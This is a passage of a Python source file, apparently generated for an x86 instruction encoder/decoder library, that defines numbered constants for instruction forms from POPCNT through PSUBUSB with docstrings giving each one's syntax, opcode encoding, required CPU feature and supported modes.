``POPCNT r16, r/m16``
``o16 F3 0F B8 /r``
``POPCNT``
``16/32/64-bit``
"""
POPCNT_R32_RM32: int = 2098
"""
``POPCNT r32, r/m32``
``o32 F3 0F B8 /r``
``POPCNT``
``16/32/64-bit``
"""
POPCNT_R64_RM64: int = 2099
"""
``POPCNT r64, r/m64``
``F3 o64 0F B8 /r``
``POPCNT``
``64-bit``
"""
UD1_R16_RM16: int = 2100
"""
``UD1 r16, r/m16``
``o16 0F B9 /r``
``286+``
``16/32/64-bit``
"""
UD1_R32_RM32: int = 2101
"""
``UD1 r32, r/m32``
``o32 0F B9 /r``
``386+``
``16/32/64-bit``
"""
UD1_R64_RM64: int = 2102
"""
``UD1 r64, r/m64``
``o64 0F B9 /r``
``X64``
``64-bit``
"""
BT_RM16_IMM8: int = 2103
"""
``BT r/m16, imm8``
``o16 0F BA /4 ib``
``386+``
``16/32/64-bit``
"""
BT_RM32_IMM8: int = 2104
"""
``BT r/m32, imm8``
``o32 0F BA /4 ib``
``386+``
``16/32/64-bit``
"""
BT_RM64_IMM8: int = 2105
"""
``BT r/m64, imm8``
``o64 0F BA /4 ib``
``X64``
``64-bit``
"""
BTS_RM16_IMM8: int = 2106
"""
``BTS r/m16, imm8``
``o16 0F BA /5 ib``
``386+``
``16/32/64-bit``
"""
BTS_RM32_IMM8: int = 2107
"""
``BTS r/m32, imm8``
``o32 0F BA /5 ib``
``386+``
``16/32/64-bit``
"""
BTS_RM64_IMM8: int = 2108
"""
``BTS r/m64, imm8``
``o64 0F BA /5 ib``
``X64``
``64-bit``
"""
BTR_RM16_IMM8: int = 2109
"""
``BTR r/m16, imm8``
``o16 0F BA /6 ib``
``386+``
``16/32/64-bit``
"""
BTR_RM32_IMM8: int = 2110
"""
``BTR r/m32, imm8``
``o32 0F BA /6 ib``
``386+``
``16/32/64-bit``
"""
BTR_RM64_IMM8: int = 2111
"""
``BTR r/m64, imm8``
``o64 0F BA /6 ib``
``X64``
``64-bit``
"""
BTC_RM16_IMM8: int = 2112
"""
``BTC r/m16, imm8``
``o16 0F BA /7 ib``
``386+``
``16/32/64-bit``
"""
BTC_RM32_IMM8: int = 2113
"""
``BTC r/m32, imm8``
``o32 0F BA /7 ib``
``386+``
``16/32/64-bit``
"""
BTC_RM64_IMM8: int = 2114
"""
``BTC r/m64, imm8``
``o64 0F BA /7 ib``
``X64``
``64-bit``
"""
BTC_RM16_R16: int = 2115
"""
``BTC r/m16, r16``
``o16 0F BB /r``
``386+``
``16/32/64-bit``
"""
BTC_RM32_R32: int = 2116
"""
``BTC r/m32, r32``
``o32 0F BB /r``
``386+``
``16/32/64-bit``
"""
BTC_RM64_R64: int = 2117
"""
``BTC r/m64, r64``
``o64 0F BB /r``
``X64``
``64-bit``
"""
BSF_R16_RM16: int = 2118
"""
``BSF r16, r/m16``
``o16 0F BC /r``
``386+``
``16/32/64-bit``
"""
BSF_R32_RM32: int = 2119
"""
``BSF r32, r/m32``
``o32 0F BC /r``
``386+``
``16/32/64-bit``
"""
BSF_R64_RM64: int = 2120
"""
``BSF r64, r/m64``
``o64 0F BC /r``
``X64``
``64-bit``
"""
TZCNT_R16_RM16: int = 2121
"""
``TZCNT r16, r/m16``
``o16 F3 0F BC /r``
``BMI1``
``16/32/64-bit``
"""
TZCNT_R32_RM32: int = 2122
"""
``TZCNT r32, r/m32``
``o32 F3 0F BC /r``
``BMI1``
``16/32/64-bit``
"""
TZCNT_R64_RM64: int = 2123
"""
``TZCNT r64, r/m64``
``F3 o64 0F BC /r``
``BMI1``
``64-bit``
"""
BSR_R16_RM16: int = 2124
"""
``BSR r16, r/m16``
``o16 0F BD /r``
``386+``
``16/32/64-bit``
"""
BSR_R32_RM32: int = 2125
"""
``BSR r32, r/m32``
``o32 0F BD /r``
``386+``
``16/32/64-bit``
"""
BSR_R64_RM64: int = 2126
"""
``BSR r64, r/m64``
``o64 0F BD /r``
``X64``
``64-bit``
"""
LZCNT_R16_RM16: int = 2127
"""
``LZCNT r16, r/m16``
``o16 F3 0F BD /r``
``LZCNT``
``16/32/64-bit``
"""
LZCNT_R32_RM32: int = 2128
"""
``LZCNT r32, r/m32``
``o32 F3 0F BD /r``
``LZCNT``
``16/32/64-bit``
"""
LZCNT_R64_RM64: int = 2129
"""
``LZCNT r64, r/m64``
``F3 o64 0F BD /r``
``LZCNT``
``64-bit``
"""
MOVSX_R16_RM8: int = 2130
"""
``MOVSX r16, r/m8``
``o16 0F BE /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R32_RM8: int = 2131
"""
``MOVSX r32, r/m8``
``o32 0F BE /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R64_RM8: int = 2132
"""
``MOVSX r64, r/m8``
``o64 0F BE /r``
``X64``
``64-bit``
"""
MOVSX_R16_RM16: int = 2133
"""
``MOVSX r16, r/m16``
``o16 0F BF /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R32_RM16: int = 2134
"""
``MOVSX r32, r/m16``
``o32 0F BF /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R64_RM16: int = 2135
"""
``MOVSX r64, r/m16``
``o64 0F BF /r``
``X64``
``64-bit``
"""
XADD_RM8_R8: int = 2136
"""
``XADD r/m8, r8``
``0F C0 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM16_R16: int = 2137
"""
``XADD r/m16, r16``
``o16 0F C1 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM32_R32: int = 2138
"""
``XADD r/m32, r32``
``o32 0F C1 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM64_R64: int = 2139
"""
``XADD r/m64, r64``
``o64 0F C1 /r``
``X64``
``64-bit``
"""
CMPPS_XMM_XMMM128_IMM8: int = 2140
"""
``CMPPS xmm1, xmm2/m128, imm8``
``NP 0F C2 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VCMPPS_XMM_XMM_XMMM128_IMM8: int = 2141
"""
``VCMPPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VCMPPS_YMM_YMM_YMMM256_IMM8: int = 2142
"""
``VCMPPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_XMM_XMMM128B32_IMM8: int = 2143
"""
``VCMPPS k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.0F.W0 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_YMM_YMMM256B32_IMM8: int = 2144
"""
``VCMPPS k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.0F.W0 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_ZMM_ZMMM512B32_IMM8_SAE: int = 2145
"""
``VCMPPS k1 {k2}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.0F.W0 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPPD_XMM_XMMM128_IMM8: int = 2146
"""
``CMPPD xmm1, xmm2/m128, imm8``
``66 0F C2 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VCMPPD_XMM_XMM_XMMM128_IMM8: int = 2147
"""
``VCMPPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VCMPPD_YMM_YMM_YMMM256_IMM8: int = 2148
"""
``VCMPPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_XMM_XMMM128B64_IMM8: int = 2149
"""
``VCMPPD k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_YMM_YMMM256B64_IMM8: int = 2150
"""
``VCMPPD k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_ZMM_ZMMM512B64_IMM8_SAE: int = 2151
"""
``VCMPPD k1 {k2}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F.W1 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPSS_XMM_XMMM32_IMM8: int = 2152
"""
``CMPSS xmm1, xmm2/m32, imm8``
``F3 0F C2 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VCMPSS_XMM_XMM_XMMM32_IMM8: int = 2153
"""
``VCMPSS xmm1, xmm2, xmm3/m32, imm8``
``VEX.LIG.F3.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPSS_KR_K1_XMM_XMMM32_IMM8_SAE: int = 2154
"""
``VCMPSS k1 {k2}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.F3.0F.W0 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPSD_XMM_XMMM64_IMM8: int = 2155
"""
``CMPSD xmm1, xmm2/m64, imm8``
``F2 0F C2 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VCMPSD_XMM_XMM_XMMM64_IMM8: int = 2156
"""
``VCMPSD xmm1, xmm2, xmm3/m64, imm8``
``VEX.LIG.F2.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPSD_KR_K1_XMM_XMMM64_IMM8_SAE: int = 2157
"""
``VCMPSD k1 {k2}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.F2.0F.W1 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
MOVNTI_M32_R32: int = 2158
"""
``MOVNTI m32, r32``
``NP 0F C3 /r``
``SSE2``
``16/32/64-bit``
"""
MOVNTI_M64_R64: int = 2159
"""
``MOVNTI m64, r64``
``NP o64 0F C3 /r``
``SSE2``
``64-bit``
"""
PINSRW_MM_R32M16_IMM8: int = 2160
"""
``PINSRW mm, r32/m16, imm8``
``NP 0F C4 /r ib``
``SSE``
``16/32/64-bit``
"""
PINSRW_MM_R64M16_IMM8: int = 2161
"""
``PINSRW mm, r64/m16, imm8``
``NP o64 0F C4 /r ib``
``SSE``
``64-bit``
"""
PINSRW_XMM_R32M16_IMM8: int = 2162
"""
``PINSRW xmm, r32/m16, imm8``
``66 0F C4 /r ib``
``SSE2``
``16/32/64-bit``
"""
PINSRW_XMM_R64M16_IMM8: int = 2163
"""
``PINSRW xmm, r64/m16, imm8``
``66 o64 0F C4 /r ib``
``SSE2``
``64-bit``
"""
VEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2164
"""
``VPINSRW xmm1, xmm2, r32/m16, imm8``
``VEX.128.66.0F.W0 C4 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2165
"""
``VPINSRW xmm1, xmm2, r64/m16, imm8``
``VEX.128.66.0F.W1 C4 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2166
"""
``VPINSRW xmm1, xmm2, r32/m16, imm8``
``EVEX.128.66.0F.W0 C4 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2167
"""
``VPINSRW xmm1, xmm2, r64/m16, imm8``
``EVEX.128.66.0F.W1 C4 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRW_R32_MM_IMM8: int = 2168
"""
``PEXTRW r32, mm, imm8``
``NP 0F C5 /r ib``
``SSE``
``16/32/64-bit``
"""
PEXTRW_R64_MM_IMM8: int = 2169
"""
``PEXTRW r64, mm, imm8``
``NP o64 0F C5 /r ib``
``SSE``
``64-bit``
"""
PEXTRW_R32_XMM_IMM8: int = 2170
"""
``PEXTRW r32, xmm, imm8``
``66 0F C5 /r ib``
``SSE2``
``16/32/64-bit``
"""
PEXTRW_R64_XMM_IMM8: int = 2171
"""
``PEXTRW r64, xmm, imm8``
``66 o64 0F C5 /r ib``
``SSE2``
``64-bit``
"""
VEX_VPEXTRW_R32_XMM_IMM8: int = 2172
"""
``VPEXTRW r32, xmm1, imm8``
``VEX.128.66.0F.W0 C5 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRW_R64_XMM_IMM8: int = 2173
"""
``VPEXTRW r64, xmm1, imm8``
``VEX.128.66.0F.W1 C5 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRW_R32_XMM_IMM8: int = 2174
"""
``VPEXTRW r32, xmm1, imm8``
``EVEX.128.66.0F.W0 C5 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRW_R64_XMM_IMM8: int = 2175
"""
``VPEXTRW r64, xmm1, imm8``
``EVEX.128.66.0F.W1 C5 /r ib``
``AVX512BW``
``64-bit``
"""
SHUFPS_XMM_XMMM128_IMM8: int = 2176
"""
``SHUFPS xmm1, xmm2/m128, imm8``
``NP 0F C6 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VSHUFPS_XMM_XMM_XMMM128_IMM8: int = 2177
"""
``VSHUFPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VSHUFPS_YMM_YMM_YMMM256_IMM8: int = 2178
"""
``VSHUFPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VSHUFPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 2179
"""
``VSHUFPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.0F.W0 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 2180
"""
``VSHUFPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.0F.W0 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 2181
"""
``VSHUFPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.0F.W0 C6 /r ib``
``AVX512F``
``16/32/64-bit``
"""
SHUFPD_XMM_XMMM128_IMM8: int = 2182
"""
``SHUFPD xmm1, xmm2/m128, imm8``
``66 0F C6 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VSHUFPD_XMM_XMM_XMMM128_IMM8: int = 2183
"""
``VSHUFPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VSHUFPD_YMM_YMM_YMMM256_IMM8: int = 2184
"""
``VSHUFPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VSHUFPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 2185
"""
``VSHUFPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 2186
"""
``VSHUFPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 2187
"""
``VSHUFPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 C6 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPXCHG8B_M64: int = 2188
"""
``CMPXCHG8B m64``
``0F C7 /1``
``CX8``
``16/32/64-bit``
"""
CMPXCHG16B_M128: int = 2189
"""
``CMPXCHG16B m128``
``o64 0F C7 /1``
``CMPXCHG16B``
``64-bit``
"""
XRSTORS_MEM: int = 2190
"""
``XRSTORS mem``
``NP 0F C7 /3``
``XSAVES``
``16/32/64-bit``
"""
XRSTORS64_MEM: int = 2191
"""
``XRSTORS64 mem``
``NP o64 0F C7 /3``
``XSAVES``
``64-bit``
"""
XSAVEC_MEM: int = 2192
"""
``XSAVEC mem``
``NP 0F C7 /4``
``XSAVEC``
``16/32/64-bit``
"""
XSAVEC64_MEM: int = 2193
"""
``XSAVEC64 mem``
``NP o64 0F C7 /4``
``XSAVEC``
``64-bit``
"""
XSAVES_MEM: int = 2194
"""
``XSAVES mem``
``NP 0F C7 /5``
``XSAVES``
``16/32/64-bit``
"""
XSAVES64_MEM: int = 2195
"""
``XSAVES64 mem``
``NP o64 0F C7 /5``
``XSAVES``
``64-bit``
"""
VMPTRLD_M64: int = 2196
"""
``VMPTRLD m64``
``NP 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
VMCLEAR_M64: int = 2197
"""
``VMCLEAR m64``
``66 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
VMXON_M64: int = 2198
"""
``VMXON m64``
``F3 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
RDRAND_R16: int = 2199
"""
``RDRAND r16``
``o16 0F C7 /6``
``RDRAND``
``16/32/64-bit``
"""
RDRAND_R32: int = 2200
"""
``RDRAND r32``
``o32 0F C7 /6``
``RDRAND``
``16/32/64-bit``
"""
RDRAND_R64: int = 2201
"""
``RDRAND r64``
``o64 0F C7 /6``
``RDRAND``
``64-bit``
"""
VMPTRST_M64: int = 2202
"""
``VMPTRST m64``
``NP 0F C7 /7``
``VMX``
``16/32/64-bit``
"""
RDSEED_R16: int = 2203
"""
``RDSEED r16``
``o16 0F C7 /7``
``RDSEED``
``16/32/64-bit``
"""
RDSEED_R32: int = 2204
"""
``RDSEED r32``
``o32 0F C7 /7``
``RDSEED``
``16/32/64-bit``
"""
RDSEED_R64: int = 2205
"""
``RDSEED r64``
``o64 0F C7 /7``
``RDSEED``
``64-bit``
"""
RDPID_R32: int = 2206
"""
``RDPID r32``
``F3 0F C7 /7``
``RDPID``
``16/32-bit``
"""
RDPID_R64: int = 2207
"""
``RDPID r64``
``F3 0F C7 /7``
``RDPID``
``64-bit``
"""
BSWAP_R16: int = 2208
"""
``BSWAP r16``
``o16 0F C8+rw``
``486+``
``16/32/64-bit``
"""
BSWAP_R32: int = 2209
"""
``BSWAP r32``
``o32 0F C8+rd``
``486+``
``16/32/64-bit``
"""
BSWAP_R64: int = 2210
"""
``BSWAP r64``
``o64 0F C8+ro``
``X64``
``64-bit``
"""
ADDSUBPD_XMM_XMMM128: int = 2211
"""
``ADDSUBPD xmm1, xmm2/m128``
``66 0F D0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VADDSUBPD_XMM_XMM_XMMM128: int = 2212
"""
``VADDSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDSUBPD_YMM_YMM_YMMM256: int = 2213
"""
``VADDSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
ADDSUBPS_XMM_XMMM128: int = 2214
"""
``ADDSUBPS xmm1, xmm2/m128``
``F2 0F D0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VADDSUBPS_XMM_XMM_XMMM128: int = 2215
"""
``VADDSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDSUBPS_YMM_YMM_YMMM256: int = 2216
"""
``VADDSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
PSRLW_MM_MMM64: int = 2217
"""
``PSRLW mm, mm/m64``
``NP 0F D1 /r``
``MMX``
``16/32/64-bit``
"""
PSRLW_XMM_XMMM128: int = 2218
"""
``PSRLW xmm1, xmm2/m128``
``66 0F D1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLW_XMM_XMM_XMMM128: int = 2219
"""
``VPSRLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLW_YMM_YMM_XMMM128: int = 2220
"""
``VPSRLW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLW_XMM_K1Z_XMM_XMMM128: int = 2221
"""
``VPSRLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_YMM_K1Z_YMM_XMMM128: int = 2222
"""
``VPSRLW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG D1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_ZMM_K1Z_ZMM_XMMM128: int = 2223
"""
``VPSRLW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG D1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRLD_MM_MMM64: int = 2224
"""
``PSRLD mm, mm/m64``
``NP 0F D2 /r``
``MMX``
``16/32/64-bit``
"""
PSRLD_XMM_XMMM128: int = 2225
"""
``PSRLD xmm1, xmm2/m128``
``66 0F D2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLD_XMM_XMM_XMMM128: int = 2226
"""
``VPSRLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLD_YMM_YMM_XMMM128: int = 2227
"""
``VPSRLD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLD_XMM_K1Z_XMM_XMMM128: int = 2228
"""
``VPSRLD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 D2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_YMM_K1Z_YMM_XMMM128: int = 2229
"""
``VPSRLD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 D2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_ZMM_K1Z_ZMM_XMMM128: int = 2230
"""
``VPSRLD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 D2 /r``
``AVX512F``
``16/32/64-bit``
"""
PSRLQ_MM_MMM64: int = 2231
"""
``PSRLQ mm, mm/m64``
``NP 0F D3 /r``
``MMX``
``16/32/64-bit``
"""
PSRLQ_XMM_XMMM128: int = 2232
"""
``PSRLQ xmm1, xmm2/m128``
``66 0F D3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLQ_XMM_XMM_XMMM128: int = 2233
"""
``VPSRLQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLQ_YMM_YMM_XMMM128: int = 2234
"""
``VPSRLQ ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLQ_XMM_K1Z_XMM_XMMM128: int = 2235
"""
``VPSRLQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 D3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_YMM_K1Z_YMM_XMMM128: int = 2236
"""
``VPSRLQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 D3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_ZMM_K1Z_ZMM_XMMM128: int = 2237
"""
``VPSRLQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 D3 /r``
``AVX512F``
``16/32/64-bit``
"""
PADDQ_MM_MMM64: int = 2238
"""
``PADDQ mm, mm/m64``
``NP 0F D4 /r``
``MMX``
``16/32/64-bit``
"""
PADDQ_XMM_XMMM128: int = 2239
"""
``PADDQ xmm1, xmm2/m128``
``66 0F D4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDQ_XMM_XMM_XMMM128: int = 2240
"""
``VPADDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDQ_YMM_YMM_YMMM256: int = 2241
"""
``VPADDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDQ_XMM_K1Z_XMM_XMMM128B64: int = 2242
"""
``VPADDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 D4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDQ_YMM_K1Z_YMM_YMMM256B64: int = 2243
"""
``VPADDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 D4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2244
"""
``VPADDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 D4 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULLW_MM_MMM64: int = 2245
"""
``PMULLW mm, mm/m64``
``NP 0F D5 /r``
``MMX``
``16/32/64-bit``
"""
PMULLW_XMM_XMMM128: int = 2246
"""
``PMULLW xmm1, xmm2/m128``
``66 0F D5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULLW_XMM_XMM_XMMM128: int = 2247
"""
``VPMULLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULLW_YMM_YMM_YMMM256: int = 2248
"""
``VPMULLW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULLW_XMM_K1Z_XMM_XMMM128: int = 2249
"""
``VPMULLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULLW_YMM_K1Z_YMM_YMMM256: int = 2250
"""
``VPMULLW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULLW_ZMM_K1Z_ZMM_ZMMM512: int = 2251
"""
``VPMULLW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D5 /r``
``AVX512BW``
``16/32/64-bit``
"""
MOVQ_XMMM64_XMM: int = 2252
"""
``MOVQ xmm2/m64, xmm1``
``66 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVQ_XMMM64_XMM: int = 2253
"""
``VMOVQ xmm1/m64, xmm2``
``VEX.128.66.0F.WIG D6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMMM64_XMM: int = 2254
"""
``VMOVQ xmm1/m64, xmm2``
``EVEX.128.66.0F.W1 D6 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVQ2DQ_XMM_MM: int = 2255
"""
``MOVQ2DQ xmm, mm``
``F3 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
MOVDQ2Q_MM_XMM: int = 2256
"""
``MOVDQ2Q mm, xmm``
``F2 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
PMOVMSKB_R32_MM: int = 2257
"""
``PMOVMSKB r32, mm``
``NP 0F D7 /r``
``SSE``
``16/32/64-bit``
"""
PMOVMSKB_R64_MM: int = 2258
"""
``PMOVMSKB r64, mm``
``NP o64 0F D7 /r``
``SSE``
``64-bit``
"""
PMOVMSKB_R32_XMM: int = 2259
"""
``PMOVMSKB r32, xmm``
``66 0F D7 /r``
``SSE2``
``16/32/64-bit``
"""
PMOVMSKB_R64_XMM: int = 2260
"""
``PMOVMSKB r64, xmm``
``66 o64 0F D7 /r``
``SSE2``
``64-bit``
"""
VEX_VPMOVMSKB_R32_XMM: int = 2261
"""
``VPMOVMSKB r32, xmm1``
``VEX.128.66.0F.W0 D7 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVMSKB_R64_XMM: int = 2262
"""
``VPMOVMSKB r64, xmm1``
``VEX.128.66.0F.W1 D7 /r``
``AVX``
``64-bit``
"""
VEX_VPMOVMSKB_R32_YMM: int = 2263
"""
``VPMOVMSKB r32, ymm1``
``VEX.256.66.0F.W0 D7 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMOVMSKB_R64_YMM: int = 2264
"""
``VPMOVMSKB r64, ymm1``
``VEX.256.66.0F.W1 D7 /r``
``AVX2``
``64-bit``
"""
PSUBUSB_MM_MMM64: int = 2265
"""
``PSUBUSB mm, mm/m64``
``NP 0F D8 /r``
``MMX``
``16/32/64-bit``
"""
